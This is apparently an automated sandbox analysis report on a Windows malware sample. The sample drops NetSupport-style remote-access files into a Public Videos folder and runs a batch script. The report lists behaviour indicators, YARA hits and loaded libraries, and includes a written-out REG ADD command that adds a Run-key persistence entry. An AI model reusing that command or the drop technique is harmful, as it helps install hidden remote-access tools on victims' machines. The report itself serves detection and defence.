                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1700783369.000000000306B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,5_2_11032EE0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,4_2_110321E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110076F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11113880
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11113880
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.2e94800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1905822054.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7552, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7720, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7988, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111158B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,5_2_111158B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00157070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00157070
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115DB40
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001659840_2_00165984
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001584090_2_00158409
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015E0450_2_0015E045
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017E8D40_2_0017E8D4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001630E60_2_001630E6
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016E94A0_2_0016E94A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015D1D20_2_0015D1D2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015BA1A0_2_0015BA1A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001532030_2_00153203
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016F25E0_2_0016F25E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016FAC80_2_0016FAC8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00162B3A0_2_00162B3A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017A35E0_2_0017A35E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172B780_2_00172B78
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001663F20_2_001663F2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015DBE20_2_0015DBE2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015EC970_2_0015EC97
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00162DB50_2_00162DB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00165DB90_2_00165DB9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015D5E40_2_0015D5E4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016EE460_2_0016EE46
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00155E960_2_00155E96
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016F6930_2_0016F693
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179EB00_2_00179EB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015276C0_2_0015276C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00164FB50_2_00164FB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00153FC50_2_00153FC5
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110733B04_2_110733B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110295904_2_11029590
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11061C904_2_11061C90
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110330104_2_11033010
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111632204_2_11163220
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111674854_2_11167485
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110454F04_2_110454F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101B7604_2_1101B760
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111258B04_2_111258B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101BBA04_2_1101BBA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11087C604_2_11087C60
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110700904_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110804804_2_11080480
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115E9804_2_1115E980
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1101C9C04_2_1101C9C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110088AB4_2_110088AB
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11061C905_2_11061C90
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110330105_2_11033010
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110733B05_2_110733B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111632205_2_11163220
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110295905_2_11029590
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111674855_2_11167485
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110454F05_2_110454F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101B7605_2_1101B760
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111258B05_2_111258B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101BBA05_2_1101BBA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11087C605_2_11087C60
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110700905_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110804805_2_11080480
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115E9805_2_1115E980
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1101C9C05_2_1101C9C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110088AB5_2_110088AB
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11050D805_2_11050D80
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 110B7A20 appears 40 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11146450 appears 1118 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11146EC0 appears 41 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1116F010 appears 67 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11029450 appears 1830 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 111603E3 appears 76 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11173663 appears 36 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1105DD10 appears 566 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11081BB0 appears 77 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 1105DE40 appears 54 times
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: String function: 11164010 appears 64 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0016CDF0 appears 37 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0016CEC0 appears 53 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0016D870 appears 31 times
                                Source: file.exe, 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs file.exe
                                Source: file.exe, 00000000.00000003.1700783369.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: classification engineClassification label: mal88.rans.evad.winEXE@11/13@1/2
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11059C50 GetLastError,FormatMessageA,LocalFree,4_2_11059C50
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D440
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,4_2_1109D4D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,5_2_1109D440
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,5_2_1109D4D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00168BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00168BD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\PublicJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_0016C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_0016C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_0016C131
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: file.exeVirustotal: Detection: 51%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
                                Source: unknownProcess created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Public\Videos\Video\bild.exe "C:\Users\Public\Public\Videos\Video\bild.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpuclnt.dllJump to behavior
